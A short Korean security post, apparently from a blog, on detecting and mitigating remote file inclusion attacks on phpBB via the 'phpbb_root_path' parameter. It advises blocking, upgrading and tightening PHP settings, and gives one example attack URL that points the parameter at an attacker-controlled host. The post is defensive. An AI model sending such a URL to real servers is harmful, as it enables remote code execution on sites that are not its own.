"phpbb_root_path" 변수의 경우 자주 쓰는 변수 이므로 오탐이 있을수 있습니다. 그렇기 때문에 이러한 이벤트의 경우 "phpbb_root_path" 변수의 값을 기준으로 공격성을 판단합니다.
이벤트 발생시 공격성이 있을 경우 즉각 차단 조치 해야합니다. 이 외에 각각의 php board 의 버전을 확인 하여 취약점이 제거된 버전으로 바꿔줘야 합니다.
참고로 "allow_url_fopen" 및 "register_globals" 지시어를 "enable" 로 설정 할 경우 발생하며 해당 지시어를 "enable" 로 설정 하지 않을 경우 침해를 피할수 있습니다. 다만 "enable" 로 설정 하지 않을 경우 특정 서비스가 안될수 있습니다. 해당 설정에 대해선 따로 테스트 후에 적용을 하여야 합니다.
예
다중원격 스크립트 삽입과 크로스사이트 스크립팅 취약점
>> 형식 : http://www.example.com/admin/addentry.php?phpbb_root_path=http://[attacker]/
(0) 
(0)
피곤 
